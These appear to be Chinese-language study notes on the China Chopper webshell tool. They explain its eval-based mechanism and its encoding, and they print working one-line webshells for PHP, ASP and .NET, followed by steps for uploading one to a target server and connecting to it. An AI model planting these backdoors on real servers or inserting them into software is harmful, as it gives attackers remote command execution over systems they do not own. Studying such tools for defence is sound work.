版权归作者所有,转载请注明出处
中国菜刀学习笔记
学习参考:https://www.cnblogs.com/milantgh/p/4285735.html
中国菜刀原理
就是通过写脚本的方式去到目标地址进行一些操作,比如写一段循环遍历目录文件的的代码来列举目标地址的指定目录
自写脚本 eval函数 会在执行完指令后将结果回显给当前这个HTTP连接
文件管理--列目录
惯用加密手法 URL Encode(有无%存在)以及Base64 base64解码时不能包含&这样的符号 否则解不出来
文件管理--上传文件 webshell最重要的功能
百度百科、
eval客户端部分,服务端只需要简单的一行代码,即可用次程序实现常用的管理功能。
支持服务端脚本:php、asp、.NET
在服务端运行的代码如下
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(注意: .NET要单独一个文件或此文件也是Jscript语言)
使用菜刀工具去连接这个含有一句话木马的文件 输入指定的密码(你自己设置的,因为一句话木马也是你自己写的)
1.服务端存在一句话木马(你上传上去的包含一句话木马的文件,可以上传)
2.使用菜刀去连接这个文件
